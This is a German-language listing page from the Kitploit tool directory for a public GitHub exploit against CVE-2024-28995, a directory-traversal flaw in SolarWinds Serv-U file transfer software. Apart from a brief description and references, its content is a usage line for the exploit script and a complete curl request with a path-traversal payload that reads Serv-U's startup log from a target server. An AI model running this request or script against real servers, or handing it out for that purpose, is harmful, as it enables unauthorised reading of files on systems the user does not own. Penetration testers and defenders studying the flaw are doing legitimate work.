Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/0xc4t/cve-2024-28995
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHub0xc4t/cve-2024-28995

CVE-2024-28995

Exploit für CVE-2024-28995

Repository anzeigen
21vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Exploit für CVE-2024-28995

Am 5. Juni 2024 veröffentlichte SolarWinds einen Advisory für CVE-2024-28995, eine kritische Directory-Traversal-Schwachstelle, die ihre Dateiübertragungslösung Serv-U betrifft. Die Schwachstelle wurde von dem Forscher Hussein Daher von Web Immunify entdeckt.

Verwendung des Exploits

root@kitploit:~
python3 CVE-2024-28995.py -t http://example.com/ -f somefile

Verwendung von Curl

root@kitploit:~
curl -i -k --path-as-is "http://<target>/?InternalDir=/../../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U-StartupLog.txt"

Referenzen:

  • https://attackerkb.com/topics/2k7UrkHyl3/cve-2024-28995/rapid7-analysis
  • https://nvd.nist.gov/vuln/detail/CVE-2024-28995
Tool herunterladen